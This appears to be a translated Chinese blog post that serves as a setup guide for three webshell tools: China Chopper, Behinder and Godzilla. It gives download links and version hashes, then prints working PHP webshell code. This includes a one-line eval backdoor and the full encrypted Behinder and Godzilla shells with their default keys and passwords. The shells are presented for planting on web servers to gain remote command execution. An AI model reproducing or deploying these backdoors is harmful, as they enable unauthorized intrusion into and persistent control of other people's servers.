当前位置:网站首页>Download of common getshell tools
Download of common getshell tools
2022-07-19 11:12:00 【quan9i】
Chinese kitchen knife
Download link
https://github.com/raddyfiy/caidao-official-version
Verify after downloading MD5 value
certutil -hashfile caidao.exe MD5

Compare with the document
(chopper.exe)md5 Verification code of each version ( only exe The main program ):
20111116 => 5001ef50c7e869253a7c152a638eab8a
20141213 => 4b4a956b9c7dc734f339fa05e4c2a990
20160620 - ac86066ffd58779f4c0db5030574b0cb
20160622 - acaf6564637ba97f73297b0096c2994c # Repair the mysql The statement
20160622 The configuration file caidao.conf - > 4ed9e48fcfc0119a0f47ea89db6cd6ab
Earlier :
20111116 => 5001ef50c7e869253a7c152a638eab8a
along with GMT Dynamic password for date change , Please pay attention to the usage readme.txt
20111022 => 7876d05ed4ee02967afc44a936186d2e
Customize Mode C# The server adds the database management function ...
20110811 => 854bb49a84ce784ad70da7fd356d4f49
ASP.NET Upload part of Bug Repair , Another one was written Customize Mode C# Server side
20110806 => 4c8bc36c41151170f701f755ef700916
Fix some BUG
20110710 => d89c5957a1dc72bb229be070635e19b2
Solve the problem that the return value of the confirmation dialog box is incorrect BUG.
20110707 => ec66b85fba3a8b7d1a41910ae5239b24
Solve the problem of opening a new tab in the browser BUG.
20110703 => 3a8140e8e124326388cb13e6d9d0d4b5
Several options have been added to the configuration :
Example of default terminal program path setting :<SHELL>/bin/sh</SHELL>
Example of default command setting of virtual terminal :<CMD>whoami</CMD>
Example of directory settings opened by default for file management :<CD>c:\windows\temp\</CD>
20110630 => 7e6c415ca57e6ecaa6c61147a2549477
Database import , Write a script and submit it after coding , Repair browser small BUG, Other .
The website opens a self written script sharing column , The script coding specification can be seen in the downloaded example .
20110628 => 60b49098d099ad01c3d80a5f794d4ebd
PHP Connect MySQL Add a <L></L> Options , Used to set the character set of the database ;
The self written script can be executed in the browser , For an example, see Script/phpspy2011.ccc;
Solve the problem of slow display when there are too many directory files ;
Because the cache library read has changed , It's best to empty the cache after this update .
Can download ip.dat Put it in the directory of the kitchen knife , Used to display the country of the website .
You can send me an email if you have any problems with it .
20100928 => c05d44dbe353525f492208d891b53875
Interface adjustment , Fixed some BUG, Add a ColdFusion Example server of version ( Only file management and virtual terminals ,MX 7 The function of modifying file time in versions and below is not available )
20100812 => 4398e87939edb8573c44592942dca503
Major renewal , From this version , Kitchen knife open interface , Support all dynamic scripts , The server can be customized on demand .
Wrote a jsp The service side ( file management / Virtual terminal / Database management ), Other servers can write by themselves according to the interface !
Confirm that there is no back door , installation is complete
Start using , This tool is similar to Chinese ant sword , Used to connect a sentence Trojan getshell
Write the path on the left , Just write the password on the right , The content of the document is <?php @eval($_POST[1]);?>

Ice scorpion
Download link
https://github.com/rebeyond/Behinder/releases
establish shell file , The content is the one brought by ice scorpion shell.php that will do , As shown below
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // The key is the connection password 32 position md5 Before the value 16 position , Default connection password rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{
public function __invoke($p) {
eval($p."");}}
@call_user_func(new C(),$params);
?>



Godzilla
Download address
https://github.com/BeichenDream/Godzilla/releases
shell The contents are as follows
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (stripos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
Connect 


边栏推荐
- Introduction to virtualization troubleshooting
- 博弈论(depu)与投资(40/100)
- Environment variable configuration of win10
- web安全入门-部署Snort开源IDS/IPS系统
- (2) Using MySQL
- 6G smart endogenous: technical challenges, architecture and key features
- ThreadLocal变量使用及原理
- OpenCV编程:OpenCV3.X训练自己的分类器
- 论文笔记:Mind the Gap An Experimental Evaluation of Imputation ofMissing Values Techniques in TimeSeries
- input number 纯数字输入 限制长度 限制 最大值
猜你喜欢

Four methods of traversing key value in map

Journal日志与oplog日志的区别

Un modèle de détection par défaut basé sur le réseau neuronal évolutif rapide dans le contrôle de la qualité des produits - lire les notes

Unity dropdown (editable, inputable) drop-down selection box with Text Association

Mysql索引的类型(单列索引、组合索引 btree索引 聚簇索引等)

Documents required for military product development process - advanced version

Avi Deployment Guide (2): overview of AVI architecture

Unity3d 模型中心点的转换(源代码)

LeetCode 745. 前缀和后缀搜索

Scala's dosing in idea
随机推荐
How much money can you make by inventing flash memory? This is a Japanese dog blood story
Unity3d 模型中心点的转换(源代码)
Goldfish rhca memoirs: cl210 describes the openstack control plane -- identify the overcloud control platform service + chapter experiment
基于网络编码的卫星网络容量提升方法
早期单片机加密的一些方法 【评论区领取资料】
LeetCode 2249. Count the number of grid points in the circle
数据库锁的介绍与InnoDB共享,排他锁
466-82(3、146、215)
Beego framework realizes file upload + seven cattle cloud storage
Connected graph (union search set)
LeetCode 2335. Minimum total time required to fill the cup
NVIDIA uses AI to design GPU: the latest H100 has been used, which reduces the chip area by 25% compared with traditional EDA
Unity3d 读取mpu9250 例子原代码
Pytorch. NN implementation of multi-layer perceptron
QT two overloaded qlistwidget control objects implement selectitem drag drag
Use and principle of ThreadLocal variable
Today's sleep quality record 79 points
ENVI_IDL:使用反距离权重法选取最近n个点插值(底层实现)并输出为Geotiff格式(效果等价于Arcgis中反距离权重插值)
Paper notes: mind the gap an empirical evaluation of impaction ofmissing values techniques in timeseries
High number__ Relationship between equation and function